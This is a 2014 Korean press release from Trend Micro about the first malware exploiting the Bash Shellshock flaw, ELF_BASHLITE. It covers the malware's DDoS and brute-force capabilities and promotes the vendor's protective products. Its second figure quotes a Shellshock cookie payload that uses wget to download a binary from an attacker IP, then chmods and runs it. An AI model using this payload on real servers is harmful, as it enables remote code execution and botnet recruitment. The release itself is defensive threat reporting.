Skip to content

2014 보도자료

보도자료 문의

pr@trendmicro.co.kr
Tel. 02-561-0990
Fax. 02-561-0660

Bash 취약점(Shellshock)을 이용한 악성코드 출현

등록일 : 2014-09-26

트렌드마이크로는 Bash 취약점에 대한 뉴스가 나온지 채 몇 시간 지나지 않아 벌써 관련 공격이 출현하였다고 밝혔다. 이 취약점은 대상시스템에서 임의 코드를 실행할 수 있고 이는 웹 서버의 컨텐츠와 코드를 변경하는 것에서부터 웹사이트 자체를 변조하거나 데이터베이스로부터 사용자 데이터를 유출하는 것도 가능하다고 언급했다.

트렌드마이크로는 실제로 해당 취약점을 이용한 코드가 포함된 악성코드 샘플에 주목하고 탐지명 ELF_BASHLITE.A (ELF_FLOODER.W로도 알려짐)으로 알려진 이 멀웨어는 DDoS 공격 수행이 가능하며 무차별대입공격(Brute Force Attack) 기능도 있어서 공격자가 사용자 계정 정보를 획득하여 C&C서버에도 접속한다.

 


[그림1] 위협 공격 다이어그램

 

Cookie:().{.:;.};.wget.-
O./tmp/besh.http://162[dot]253[dot]66[dot]76/nginx;.chmod.777./tmp/besh;./tmp/besh;

[그림2] 위 스크린샷은 시스템상에서 악성코드를 다운로드 하는 기능

 

웹서버들이 대부분이 영향을 받기 때문에 이 취약점의 심각성은 대단히 크고 사물인터넷(Internet of Everything/Internet of Things)과 연계되어 있는 리눅스와 Bash를 사용하는 기기들에 큰 위협을 야기하고 비트코인 / 비트코인 마이닝에 영향을 미칠 수 있고, 공격자들이 이 취약점을 통해 Bot 군단(armies of bots)을 만들 가능성이 있음이 보고되고 있다.

트렌드마이크로의 서버 보안 솔루션인 Deep Security 는 Bash 취약점을 가진 패치 되지 않은 서버를 보호한다. 가상 패치 기능을 통해 취약점이 있는 서버가 패치 될 때까지 서버를 취약점으로부터 보호하고 있으며 기존의 고객 이라면 간단히 새로운 룰(DSRU14-028)을 적용 할 수 있다. 또한 OS 패치가 어려운 환경의 경우 네트워크 기반 보안 장비인 트렌드마이크로 Deep Discovery에서 사전에 탐지하여 외부 URL을 차단하는 등 본 취약점에 대한 피해를 막을 수 있다. 맥 사용자의 경우에도 맥 전용 바이러스 백신을 통하여 방어가 가능하다.

트렌드마이크로는 자사 제품을 사용하지 않는 사용자들을 위해 아래의 링크를 통해 취약성 여부를 무료로 확인할 수 있도록 안내하고 있다.
http://www.trendmicro.com/us/security/shellshock-bash-bug-exploit/index.html

더 많은 정보 보기
· SimplySecurity Blog: http://blog.trendmicro.com/bash-shellshock-vulnerability/
· Security Intelligence Blog: http://blog.trendmicro.com/trendlabs-security-intelligence/shell-attack-on-your-server-bash-bug-cve-2014-7169-and-cve-2014-6271/
· Security Intelligence Blog: http://blog.trendmicro.com/trendlabs-security-intelligence/bash-vulnerability-shellshock-exploit-emerges-in-the-wild-leads-to-flooder/
· Threat Encyclopedia: http://about-threats.trendmicro.com/us/vulnerability/6033/Bash%20Bug%20Vulnerability%20Shellshock
· Trend Micro: http://www.trendmicro.com/shellshock


Connect with KR on